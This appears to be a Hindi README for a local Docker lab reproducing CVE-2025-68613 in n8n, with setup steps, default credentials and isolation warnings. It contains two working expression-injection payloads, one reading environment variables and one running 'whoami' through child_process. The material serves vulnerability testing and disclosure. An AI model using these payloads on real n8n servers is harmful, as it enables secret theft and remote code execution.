
CVE-2025-68613 का विश्लेषण
यह रिपॉजिटरी एक सरल Docker Compose सेटअप प्रदान करती है जो CVE-2025-68613 के स्थानीय परीक्षण के लिए एक कमजोर n8n इंस्टेंस चलाती है।
कंटेनर शुरू करें:
docker compose up -d
अपने ब्राउज़र में n8n खोलें:
docker-compose.yml में सेट किए गए डिफ़ॉल्ट क्रेडेंशियल्स से लॉग इन करें:
adminpassworddocker compose down
यह वातावरण केवल स्थानीय, पृथक परीक्षण के लिए है। इस इंस्टेंस को सार्वजनिक इंटरनेट या किसी अविश्वसनीय नेटवर्क पर उजागर न करें। इसे निजी, केवल-स्थानीय नेटवर्क सेगमेंट पर रखें और उत्पादन प्रणालियों से अलग रखें। अपने जोखिम पर उपयोग करें।
एक बार कंटेनर चलने के बाद, आप n8n इंटरफ़ेस को http://localhost:5678 पर एक्सेस कर सकते हैं। कमजोरी का परीक्षण करने के लिए, आप एक अभिव्यक्ति फ़ील्ड में एक दुर्भावनापूर्ण JavaScript पेलोड इंजेक्ट करेंगे।
पुनरुत्पादन के चरण:
{{ (function() { return this.process.env; })() }}

परीक्षण 2: दूरस्थ कोड निष्पादन (RCE) यह पेलोड child_process मॉड्यूल को लोड करने का प्रयास करता है ताकि सिस्टम कमांड चलाए (जैसे, whoami)।
{{ (function() {
var require = this.process.mainModule.require;
var execSync = require('child_process').execSync;
return execSync('whoami').toString();
})() }}

अपेक्षित परिणाम: यदि वातावरण कमजोर है, तो Set नोड का "Output" पैनल कमांड का परिणाम (जैसे, root या n8n उपयोगकर्ता) या पर्यावरण चरों वाला एक JSON ऑब्जेक्ट प्रदर्शित करेगा। यदि इंस्टेंस को पैच किया गया था (जैसे, संस्करण 1.122.0+), तो सैंडबॉक्स एक खाली ऑब्जेक्ट या एक त्रुटि लौटाएगा।